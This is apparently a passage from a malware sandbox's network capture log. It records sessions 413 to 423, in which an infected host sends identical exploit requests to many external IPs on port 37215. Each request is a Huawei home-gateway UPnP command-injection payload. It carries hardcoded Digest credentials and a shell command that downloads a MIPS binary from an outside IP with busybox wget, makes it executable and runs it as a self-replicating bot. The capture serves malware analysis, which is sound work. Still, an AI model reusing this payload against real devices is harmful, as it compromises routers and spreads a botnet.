6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  413192.168.2.134466241.56.151.7437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.277168989 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  414192.168.2.1358346157.231.171.12137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.277185917 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  415192.168.2.1347782197.81.101.6937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.277203083 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  416192.168.2.1357724157.218.54.4737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.277375937 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  417192.168.2.1355876197.209.20.13237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.277393103 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  418192.168.2.135209241.183.136.4237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.277415037 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  419192.168.2.1338138197.18.179.4737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.277431011 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  420192.168.2.1337768157.120.129.25337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.277452946 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  421192.168.2.1353036197.135.220.18137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.277477980 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  422192.168.2.135408669.129.28.1837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.277497053 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  423192.168.2.136037080.96.91.18237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.277518988 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
